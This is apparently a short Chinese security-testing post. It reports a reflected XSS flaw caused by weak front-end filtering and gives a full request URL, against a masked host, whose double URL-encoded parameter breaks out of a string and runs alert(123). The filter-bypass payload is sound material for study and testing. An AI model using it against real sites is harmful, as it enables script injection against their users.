怎么都给我过滤了。。。没办法了用图片保存吧。。。
1.前端过滤不严格导致XSS
将payload用url编码进行二次编码,实现反射型XSS
https://xxxx?method=%2567%2565%2574%2556%2561%256C%2569%2564%2561%2574%2565%2549%256D%2561%2567%2565%2522%253B%2561%256c%2565%2572%2574%2528%2531%2532%2533%2529%253B%2522